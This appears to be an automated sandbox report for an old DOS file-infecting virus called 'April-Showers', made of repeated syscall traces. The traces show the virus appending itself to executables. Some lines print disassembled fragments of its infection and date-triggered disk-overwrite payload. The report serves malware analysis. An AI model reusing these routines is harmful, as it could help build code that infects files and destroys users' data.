Sample viewer

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":10686,"SideJobID":0}

.

GIF

Syscalls:

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":10686,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:28:47.682805078Z	64	PC: 0 | Write file or device (Write 2 bytes on handle 1)
2018-12-25T12:28:47.689953029Z	41	PC: 94fae | Parse filename
2018-12-25T12:28:47.695276493Z	41	PC: 9502f | Parse filename
2018-12-25T12:28:47.696878417Z	41	PC: 9504c | Parse filename
2018-12-25T12:28:47.699164018Z	26	PC: 984f7 | Set disk transfer address
2018-12-25T12:28:47.701214046Z	71	PC: 986f3 | Get current directory
2018-12-25T12:28:47.703593563Z	78	PC: 986fe | Find first file
2018-12-25T12:28:47.709838574Z	71	PC: 986f3 | Get current directory (See above)
2018-12-25T12:28:47.712381079Z	78	PC: 986fe | Find first file (See above)
2018-12-25T12:28:47.723690794Z	64	PC: 9a848 | Write file or device (Write 26 bytes on handle 2)
2018-12-25T12:28:47.727349463Z	37	PC: 123c4 | Set interrupt vector (Interrupt = '34' AKA 'Random write')
2018-12-25T12:28:47.740013934Z	37	PC: 123cb | Set interrupt vector (Interrupt = '35' AKA 'Get file size in records')
2018-12-25T12:28:47.74107893Z	37	PC: 123d2 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:28:47.742637996Z	62	PC: 122ab | Close file
2018-12-25T12:28:47.744018729Z	62	PC: 122ab | Close file (See above)
2018-12-25T12:28:47.745855853Z	62	PC: 122ab | Close file (See above)
2018-12-25T12:28:47.748156505Z	62	PC: 122ab | Close file (See above)
2018-12-25T12:28:47.750329552Z	62	PC: 122ab | Close file (See above)
2018-12-25T12:28:47.752454498Z	62	PC: 122ab | Close file (See above)
2018-12-25T12:28:47.753973834Z	62	PC: 122ab | Close file (See above)
2018-12-25T12:28:47.755497836Z	62	PC: 122ab | Close file (See above)
2018-12-25T12:28:47.757647874Z	62	PC: 122ab | Close file (See above)
2018-12-25T12:28:47.759205522Z	62	PC: 122ab | Close file (See above)
2018-12-25T12:28:47.760630578Z	62	PC: 122ab | Close file (See above)
2018-12-25T12:28:47.762861873Z	62	PC: 122ab | Close file (See above)
2018-12-25T12:28:47.764635226Z	62	PC: 122ab | Close file (See above)
2018-12-25T12:28:47.766337232Z	62	PC: 122ab | Close file (See above)
2018-12-25T12:28:47.768734287Z	62	PC: 122ab | Close file (See above)
2018-12-25T12:28:47.77093974Z	99	PC: 9a5d7 | Get DBCS lead byte table pointer
2018-12-25T12:28:47.772422098Z	56	PC: 94df9 | Get or set country info
2018-12-25T12:28:47.775137277Z	64	PC: 9a848 | Write file or device (See above)
2018-12-25T12:28:47.785947791Z	25	PC: 94e62 | Get default drive
2018-12-25T12:28:47.787805017Z	71	PC: 970dd | Get current directory
2018-12-25T12:28:47.792300978Z	64	PC: 9a848 | Write file or device (See above)
2018-12-25T12:28:47.796054201Z	2	PC: 970b2 | Character output (Char = '3e')
2018-12-25T12:28:47.798508023Z	93	PC: 94f20 | File sharing functions
2018-12-25T12:28:47.800351642Z	93	PC: 94f27 | File sharing functions
2018-12-25T12:28:47.802943181Z	10	PC: 94f39 | Buffered keyboard input
2018-12-25T12:29:02.740211536Z	0	PC: 0 | Program terminate (See above)
2018-12-25T12:29:04.095518328Z	0	PC: 0 | Program terminate (See above)
2018-12-25T12:29:04.197606117Z	64	PC: 9a848 | Write file or device (See above)
2018-12-25T12:29:04.203059256Z	41	PC: 94fae | Parse filename (See above)
2018-12-25T12:29:04.205848874Z	41	PC: 9502f | Parse filename (See above)
2018-12-25T12:29:04.207410251Z	41	PC: 9504c | Parse filename (See above)
2018-12-25T12:29:04.210375535Z	26	PC: 984f7 | Set disk transfer address (See above)
2018-12-25T12:29:04.212468912Z	71	PC: 986f3 | Get current directory (See above)
2018-12-25T12:29:04.220677751Z	78	PC: 986fe | Find first file (See above)
2018-12-25T12:29:04.230035307Z	71	PC: 9856c | Get current directory
2018-12-25T12:29:04.233746172Z	73	PC: 97c09 | Release memory
2018-12-25T12:29:04.235376864Z	75	PC: 11821 | Execute program
2018-12-25T12:29:04.24443116Z	9	PC: 12a47 | Display string (String= 'Hello, World! ')
2018-12-25T12:29:04.248091535Z	76	PC: 12a4b | Terminate with return code (Return code = '36')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":10686,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:28:47.788942967Z	26	PC: 12fe5 | Set disk transfer address
2018-12-25T12:28:47.790566982Z	71	PC: 12dc0 | Get current directory
2018-12-25T12:28:47.795474812Z	78	PC: 12e2a | Find first file
2018-12-25T12:28:47.804131998Z	61	PC: 12fee | Open file (Filename = 'TEST.EXE')
2018-12-25T12:28:47.811286427Z	63	PC: 12e45 | Read file or device (Read 26 bytes on handle 5)
2018-12-25T12:28:47.813790144Z	62	PC: 12e49 | Close file
2018-12-25T12:28:47.815505155Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:47.818125746Z	78	PC: 12e2a | Find first file (See above)
2018-12-25T12:28:47.824542353Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:47.839058135Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:47.846422276Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:47.848786302Z	67	PC: 12ff9 | Get or set file attributes
2018-12-25T12:28:47.863944603Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:47.872118612Z	64	PC: 12f1d | Write file or device (Write 5 bytes on handle 5)
2018-12-25T12:28:47.875090875Z	66	PC: 12fe0 | Move file pointer
2018-12-25T12:28:47.876782245Z	44	PC: 12f28 | Get time 0x12f28: cmp dh, 0 0x12f2b: je 0x12f24 0x12f2d: mov byte ptr cs:[bp + 0x790], dh 0x12f32: call 0x133b7 0x12f35: inc byte ptr cs:[bp + 0x791] 0x12f3a: mov ax, 0x5701 0x12f3d: mov cx, word ptr cs:[bp + 0x804] 0x12f42: mov dx, word ptr cs:[bp + 0x806] 0x12f47: int 0x21 0x12f49: mov ah, 0x3e 0x12f4b: int 0x21 0x12f4d: xor cx, cx 0x12f4f: mov cl, byte ptr cs:[bp + 0x803] 0x12f54: call 0x12ff0 0x12f57: ret 0x12f58: mov ah, 0x2a 0x12f5a: int 0x21 0x12f5c: cmp dh, 4 0x12f5f: jne 0x12fd7 0x12f61: mov ah, 9
2018-12-25T12:28:47.879312317Z	64	PC: 13413 | Write file or device (Write 1676 bytes on handle 5)
2018-12-25T12:28:47.887047257Z	87	PC: 12f49 | Get or set file date and time
2018-12-25T12:28:47.888049396Z	62	PC: 12f4d | Close file
2018-12-25T12:28:47.897200679Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:47.908915159Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:47.91139997Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:47.917454838Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:47.927233178Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:47.928537185Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:47.935027554Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:47.940540836Z	64	PC: 12f1d | Write file or device (See above)
2018-12-25T12:28:47.942488075Z	66	PC: 12fe0 | Move file pointer (See above)
2018-12-25T12:28:47.943581621Z	44	PC: 12f28 | Get time (See above)
2018-12-25T12:28:47.954651813Z	64	PC: 13413 | Write file or device (See above)
2018-12-25T12:28:47.961484456Z	87	PC: 12f49 | Get or set file date and time (See above)
2018-12-25T12:28:47.963140362Z	62	PC: 12f4d | Close file (See above)
2018-12-25T12:28:47.986461322Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:47.99953481Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:48.00214048Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:48.01376053Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:48.020077852Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:48.022272391Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:48.032361475Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:48.039394626Z	64	PC: 12f1d | Write file or device (See above)
2018-12-25T12:28:48.042821354Z	66	PC: 12fe0 | Move file pointer (See above)
2018-12-25T12:28:48.044475604Z	44	PC: 12f28 | Get time (See above)
2018-12-25T12:28:48.048510603Z	64	PC: 13413 | Write file or device (See above)
2018-12-25T12:28:48.057708407Z	87	PC: 12f49 | Get or set file date and time (See above)
2018-12-25T12:28:48.060192614Z	62	PC: 12f4d | Close file (See above)
2018-12-25T12:28:48.068942443Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:48.078770238Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:48.081992363Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:48.089458739Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:48.096240787Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:48.098291391Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:48.108937264Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:48.129982218Z	64	PC: 12f1d | Write file or device (See above)
2018-12-25T12:28:48.132688789Z	66	PC: 12fe0 | Move file pointer (See above)
2018-12-25T12:28:48.134784703Z	44	PC: 12f28 | Get time (See above)
2018-12-25T12:28:48.137450791Z	64	PC: 13413 | Write file or device (See above)
2018-12-25T12:28:48.147550692Z	87	PC: 12f49 | Get or set file date and time (See above)
2018-12-25T12:28:48.15030758Z	62	PC: 12f4d | Close file (See above)
2018-12-25T12:28:48.158492582Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:48.179840126Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:48.182962102Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:48.190554675Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:48.19701022Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:48.199333662Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:48.204861396Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:48.210097916Z	64	PC: 12f1d | Write file or device (See above)
2018-12-25T12:28:48.213082629Z	66	PC: 12fe0 | Move file pointer (See above)
2018-12-25T12:28:48.215897715Z	44	PC: 12f28 | Get time (See above)
2018-12-25T12:28:48.2189962Z	64	PC: 13413 | Write file or device (See above)
2018-12-25T12:28:48.227687762Z	87	PC: 12f49 | Get or set file date and time (See above)
2018-12-25T12:28:48.230494163Z	62	PC: 12f4d | Close file (See above)
2018-12-25T12:28:48.23232668Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:48.236747145Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:48.24013688Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:48.246687945Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:48.253817408Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:48.256735246Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:48.266839183Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:48.273611644Z	64	PC: 12f1d | Write file or device (See above)
2018-12-25T12:28:48.287021753Z	66	PC: 12fe0 | Move file pointer (See above)
2018-12-25T12:28:48.289827915Z	44	PC: 12f28 | Get time (See above)
2018-12-25T12:28:48.293241987Z	64	PC: 13413 | Write file or device (See above)
2018-12-25T12:28:48.303711898Z	87	PC: 12f49 | Get or set file date and time (See above)
2018-12-25T12:28:48.305353736Z	62	PC: 12f4d | Close file (See above)
2018-12-25T12:28:48.313081538Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:48.324330223Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:48.33301164Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:48.354781517Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:48.362126365Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:48.364406345Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:48.388926648Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:48.396528928Z	64	PC: 12f1d | Write file or device (See above)
2018-12-25T12:28:48.399726987Z	66	PC: 12fe0 | Move file pointer (See above)
2018-12-25T12:28:48.40145754Z	44	PC: 12f28 | Get time (See above)
2018-12-25T12:28:48.405304992Z	64	PC: 13413 | Write file or device (See above)
2018-12-25T12:28:48.418515763Z	87	PC: 12f49 | Get or set file date and time (See above)
2018-12-25T12:28:48.419958531Z	62	PC: 12f4d | Close file (See above)
2018-12-25T12:28:48.42838024Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:48.454699017Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:48.458199546Z	59	PC: 12dd6 | Change current directory
2018-12-25T12:28:48.463279199Z	42	PC: 12f5c | Get date 0x12f5c: cmp dh, 4 0x12f5f: jne 0x12fd7 0x12f61: mov ah, 9 0x12f63: lea dx, word ptr [bp + 0x3a0] 0x12f67: int 0x21 0x12f69: mov al, 2 0x12f6b: mov cx, 0xff 0x12f6e: mov dx, 0 0x12f71: int 0x26 0x12f73: mov al, 3 0x12f75: mov cx, 0xff 0x12f78: mov dx, 0 0x12f7b: int 0x26 0x12f7d: mov al, 4 0x12f7f: mov cx, 0xff 0x12f82: mov dx, 0 0x12f85: int 0x26 0x12f87: mov al, 5 0x12f89: mov cx, 0xff 0x12f8c: mov dx, 0
2018-12-25T12:28:48.465796201Z	59	PC: 12de3 | Change current directory
2018-12-25T12:28:48.46782946Z	26	PC: 12fe5 | Set disk transfer address (See above)
2018-12-25T12:28:48.470786512Z	9	PC: 12a54 | Display string (String= ' Virii Production by a MoM Personell Virus: April-Showers Type: Appends *.Com *.Exe Created: 03-08-1994 Sets off: Every April Effect: Destroys data Size: Enlarges files by 1.6k ')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":10686,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:28:47.881229179Z	26	PC: 12fe5 | Set disk transfer address
2018-12-25T12:28:47.882807225Z	71	PC: 12dc0 | Get current directory
2018-12-25T12:28:47.885466489Z	78	PC: 12e2a | Find first file
2018-12-25T12:28:47.891004972Z	61	PC: 12fee | Open file (Filename = 'TEST.EXE')
2018-12-25T12:28:47.90342534Z	63	PC: 12e45 | Read file or device (Read 26 bytes on handle 5)
2018-12-25T12:28:47.907471044Z	62	PC: 12e49 | Close file
2018-12-25T12:28:47.90873078Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:47.918933489Z	78	PC: 12e2a | Find first file (See above)
2018-12-25T12:28:47.925534521Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:47.932554133Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:47.939411048Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:47.941597782Z	67	PC: 12ff9 | Get or set file attributes
2018-12-25T12:28:47.956699258Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:47.963282755Z	64	PC: 12f1d | Write file or device (Write 5 bytes on handle 5)
2018-12-25T12:28:47.965433036Z	66	PC: 12fe0 | Move file pointer
2018-12-25T12:28:47.966356176Z	44	PC: 12f28 | Get time 0x12f28: cmp dh, 0 0x12f2b: je 0x12f24 0x12f2d: mov byte ptr cs:[bp + 0x790], dh 0x12f32: call 0x133b7 0x12f35: inc byte ptr cs:[bp + 0x791] 0x12f3a: mov ax, 0x5701 0x12f3d: mov cx, word ptr cs:[bp + 0x804] 0x12f42: mov dx, word ptr cs:[bp + 0x806] 0x12f47: int 0x21 0x12f49: mov ah, 0x3e 0x12f4b: int 0x21 0x12f4d: xor cx, cx 0x12f4f: mov cl, byte ptr cs:[bp + 0x803] 0x12f54: call 0x12ff0 0x12f57: ret 0x12f58: mov ah, 0x2a 0x12f5a: int 0x21 0x12f5c: cmp dh, 4 0x12f5f: jne 0x12fd7 0x12f61: mov ah, 9
2018-12-25T12:28:47.967990011Z	64	PC: 13413 | Write file or device (Write 1676 bytes on handle 5)
2018-12-25T12:28:47.974273156Z	87	PC: 12f49 | Get or set file date and time
2018-12-25T12:28:47.975212696Z	62	PC: 12f4d | Close file
2018-12-25T12:28:47.980024061Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:47.987258512Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:47.994570951Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:48.004855202Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:48.012666596Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:48.014636942Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:48.02482205Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:48.032719798Z	64	PC: 12f1d | Write file or device (See above)
2018-12-25T12:28:48.036156873Z	66	PC: 12fe0 | Move file pointer (See above)
2018-12-25T12:28:48.037797641Z	44	PC: 12f28 | Get time (See above)
2018-12-25T12:28:48.041596547Z	64	PC: 13413 | Write file or device (See above)
2018-12-25T12:28:48.050941817Z	87	PC: 12f49 | Get or set file date and time (See above)
2018-12-25T12:28:48.052626416Z	62	PC: 12f4d | Close file (See above)
2018-12-25T12:28:48.063291225Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:48.073635711Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:48.076553406Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:48.083446935Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:48.08979953Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:48.091560803Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:48.101170614Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:48.107959284Z	64	PC: 12f1d | Write file or device (See above)
2018-12-25T12:28:48.110938757Z	66	PC: 12fe0 | Move file pointer (See above)
2018-12-25T12:28:48.112761807Z	44	PC: 12f28 | Get time (See above)
2018-12-25T12:28:48.121466181Z	64	PC: 13413 | Write file or device (See above)
2018-12-25T12:28:48.130448346Z	87	PC: 12f49 | Get or set file date and time (See above)
2018-12-25T12:28:48.131901397Z	62	PC: 12f4d | Close file (See above)
2018-12-25T12:28:48.13978877Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:48.15046947Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:48.153077785Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:48.16695587Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:48.184690652Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:48.186626546Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:48.198038258Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:48.205531798Z	64	PC: 12f1d | Write file or device (See above)
2018-12-25T12:28:48.209570256Z	66	PC: 12fe0 | Move file pointer (See above)
2018-12-25T12:28:48.212276873Z	44	PC: 12f28 | Get time (See above)
2018-12-25T12:28:48.216000556Z	64	PC: 13413 | Write file or device (See above)
2018-12-25T12:28:48.225171507Z	87	PC: 12f49 | Get or set file date and time (See above)
2018-12-25T12:28:48.227341237Z	62	PC: 12f4d | Close file (See above)
2018-12-25T12:28:48.235506611Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:48.24534915Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:48.24908765Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:48.255959441Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:48.262439571Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:48.26506517Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:48.269561633Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:48.279588162Z	64	PC: 12f1d | Write file or device (See above)
2018-12-25T12:28:48.283013059Z	66	PC: 12fe0 | Move file pointer (See above)
2018-12-25T12:28:48.284679117Z	44	PC: 12f28 | Get time (See above)
2018-12-25T12:28:48.287767522Z	64	PC: 13413 | Write file or device (See above)
2018-12-25T12:28:48.299379263Z	87	PC: 12f49 | Get or set file date and time (See above)
2018-12-25T12:28:48.301252931Z	62	PC: 12f4d | Close file (See above)
2018-12-25T12:28:48.303285034Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:48.308617985Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:48.31556117Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:48.322218674Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:48.329076128Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:48.332127354Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:48.351734294Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:48.372587865Z	64	PC: 12f1d | Write file or device (See above)
2018-12-25T12:28:48.376787199Z	66	PC: 12fe0 | Move file pointer (See above)
2018-12-25T12:28:48.378475569Z	44	PC: 12f28 | Get time (See above)
2018-12-25T12:28:48.38149906Z	64	PC: 13413 | Write file or device (See above)
2018-12-25T12:28:48.391906706Z	87	PC: 12f49 | Get or set file date and time (See above)
2018-12-25T12:28:48.393413528Z	62	PC: 12f4d | Close file (See above)
2018-12-25T12:28:48.401323217Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:48.412336295Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:48.415246382Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:48.421906086Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:48.429631754Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:48.432069072Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:48.442712312Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:48.450496743Z	64	PC: 12f1d | Write file or device (See above)
2018-12-25T12:28:48.453438994Z	66	PC: 12fe0 | Move file pointer (See above)
2018-12-25T12:28:48.454666011Z	44	PC: 12f28 | Get time (See above)
2018-12-25T12:28:48.457721385Z	64	PC: 13413 | Write file or device (See above)
2018-12-25T12:28:48.468470581Z	87	PC: 12f49 | Get or set file date and time (See above)
2018-12-25T12:28:48.470056823Z	62	PC: 12f4d | Close file (See above)
2018-12-25T12:28:48.478131566Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:48.487901107Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:48.490191588Z	59	PC: 12dd6 | Change current directory
2018-12-25T12:28:48.494600429Z	42	PC: 12f5c | Get date 0x12f5c: cmp dh, 4 0x12f5f: jne 0x12fd7 0x12f61: mov ah, 9 0x12f63: lea dx, word ptr [bp + 0x3a0] 0x12f67: int 0x21 0x12f69: mov al, 2 0x12f6b: mov cx, 0xff 0x12f6e: mov dx, 0 0x12f71: int 0x26 0x12f73: mov al, 3 0x12f75: mov cx, 0xff 0x12f78: mov dx, 0 0x12f7b: int 0x26 0x12f7d: mov al, 4 0x12f7f: mov cx, 0xff 0x12f82: mov dx, 0 0x12f85: int 0x26 0x12f87: mov al, 5 0x12f89: mov cx, 0xff 0x12f8c: mov dx, 0
2018-12-25T12:28:48.496669348Z	59	PC: 12de3 | Change current directory
2018-12-25T12:28:48.498315815Z	26	PC: 12fe5 | Set disk transfer address (See above)
2018-12-25T12:28:48.501570725Z	9	PC: 12a54 | Display string (String= ' Virii Production by a MoM Personell Virus: April-Showers Type: Appends *.Com *.Exe Created: 03-08-1994 Sets off: Every April Effect: Destroys data Size: Enlarges files by 1.6k ')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":10686,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:28:48.144110308Z	26	PC: 12fe5 | Set disk transfer address
2018-12-25T12:28:48.145290049Z	71	PC: 12dc0 | Get current directory
2018-12-25T12:28:48.149650778Z	78	PC: 12e2a | Find first file
2018-12-25T12:28:48.15676055Z	61	PC: 12fee | Open file (Filename = 'TEST.EXE')
2018-12-25T12:28:48.164383652Z	63	PC: 12e45 | Read file or device (Read 26 bytes on handle 5)
2018-12-25T12:28:48.168101321Z	62	PC: 12e49 | Close file
2018-12-25T12:28:48.1699813Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:48.172677739Z	78	PC: 12e2a | Find first file (See above)
2018-12-25T12:28:48.179819405Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:48.192523294Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:48.199885151Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:48.20238301Z	67	PC: 12ff9 | Get or set file attributes
2018-12-25T12:28:48.220067Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:48.227443199Z	64	PC: 12f1d | Write file or device (Write 5 bytes on handle 5)
2018-12-25T12:28:48.230548856Z	66	PC: 12fe0 | Move file pointer
2018-12-25T12:28:48.232665036Z	44	PC: 12f28 | Get time 0x12f28: cmp dh, 0 0x12f2b: je 0x12f24 0x12f2d: mov byte ptr cs:[bp + 0x790], dh 0x12f32: call 0x133b7 0x12f35: inc byte ptr cs:[bp + 0x791] 0x12f3a: mov ax, 0x5701 0x12f3d: mov cx, word ptr cs:[bp + 0x804] 0x12f42: mov dx, word ptr cs:[bp + 0x806] 0x12f47: int 0x21 0x12f49: mov ah, 0x3e 0x12f4b: int 0x21 0x12f4d: xor cx, cx 0x12f4f: mov cl, byte ptr cs:[bp + 0x803] 0x12f54: call 0x12ff0 0x12f57: ret 0x12f58: mov ah, 0x2a 0x12f5a: int 0x21 0x12f5c: cmp dh, 4 0x12f5f: jne 0x12fd7 0x12f61: mov ah, 9
2018-12-25T12:28:48.235781926Z	64	PC: 13413 | Write file or device (Write 1676 bytes on handle 5)
2018-12-25T12:28:48.245888267Z	87	PC: 12f49 | Get or set file date and time
2018-12-25T12:28:48.248193503Z	62	PC: 12f4d | Close file
2018-12-25T12:28:48.256817102Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:48.263827498Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:48.26763688Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:48.274803125Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:48.281781844Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:48.284786327Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:48.29574847Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:48.30015386Z	64	PC: 12f1d | Write file or device (See above)
2018-12-25T12:28:48.302899613Z	66	PC: 12fe0 | Move file pointer (See above)
2018-12-25T12:28:48.30427155Z	44	PC: 12f28 | Get time (See above)
2018-12-25T12:28:48.306387104Z	64	PC: 13413 | Write file or device (See above)
2018-12-25T12:28:48.320483925Z	87	PC: 12f49 | Get or set file date and time (See above)
2018-12-25T12:28:48.322142812Z	62	PC: 12f4d | Close file (See above)
2018-12-25T12:28:48.330840151Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:48.342132537Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:48.345381615Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:48.35241469Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:48.359603833Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:48.361980449Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:48.373019975Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:48.380234255Z	64	PC: 12f1d | Write file or device (See above)
2018-12-25T12:28:48.383785289Z	66	PC: 12fe0 | Move file pointer (See above)
2018-12-25T12:28:48.38519013Z	44	PC: 12f28 | Get time (See above)
2018-12-25T12:28:48.388166933Z	64	PC: 13413 | Write file or device (See above)
2018-12-25T12:28:48.399473117Z	87	PC: 12f49 | Get or set file date and time (See above)
2018-12-25T12:28:48.401098511Z	62	PC: 12f4d | Close file (See above)
2018-12-25T12:28:48.409402902Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:48.420873558Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:48.423719549Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:48.431163284Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:48.438975867Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:48.441006627Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:48.452219327Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:48.466200915Z	64	PC: 12f1d | Write file or device (See above)
2018-12-25T12:28:48.474569935Z	66	PC: 12fe0 | Move file pointer (See above)
2018-12-25T12:28:48.476078109Z	44	PC: 12f28 | Get time (See above)
2018-12-25T12:28:48.479702699Z	64	PC: 13413 | Write file or device (See above)
